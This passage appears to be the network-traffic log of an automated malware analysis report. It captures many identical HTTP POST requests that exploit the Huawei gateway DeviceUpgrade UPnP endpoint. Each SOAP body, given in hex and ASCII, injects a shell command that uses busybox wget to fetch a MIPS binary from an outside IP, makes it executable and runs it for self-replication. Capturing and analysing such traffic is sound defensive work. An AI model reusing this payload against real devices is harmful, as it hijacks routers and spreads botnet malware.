68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 482Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 482Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 482Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 482Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 482Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 482Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 482Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 482Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 482Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 